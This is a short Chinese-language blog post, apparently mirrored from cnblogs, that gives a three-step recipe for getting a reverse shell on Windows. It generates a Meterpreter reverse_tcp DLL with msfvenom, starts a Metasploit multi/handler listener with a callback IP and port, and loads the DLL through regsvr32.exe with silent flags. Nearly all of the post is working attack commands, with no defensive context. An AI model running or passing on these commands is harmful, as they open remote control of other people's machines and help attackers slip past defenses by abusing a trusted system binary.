zoukankan      html  css  js  c++  java
  • 加载dll文件反弹shell

    第一步:生成dll文件

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll
    

    第二步:启动MSF等待回连

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.106.10
    set LPORT 443
    run
    

    第三步:加载dll文件

    # 建议加上 /s 和 /u 参数
    regsvr32.exe /s /u reverse_tcp.dll

    成功反弹shell后在进程列表中会出现rundll32.exe进程,如果退出meterpreter会话则进程消失。

  • 相关阅读:
    C 应用
    C 基本语法
    iOS
    iOS
    iOS
    iOS
    iOS
    iOS
    iOS
    iOS
  • 原文地址:https://www.cnblogs.com/dgjnszf/p/12317104.html
Copyright © 2011-2022 走看看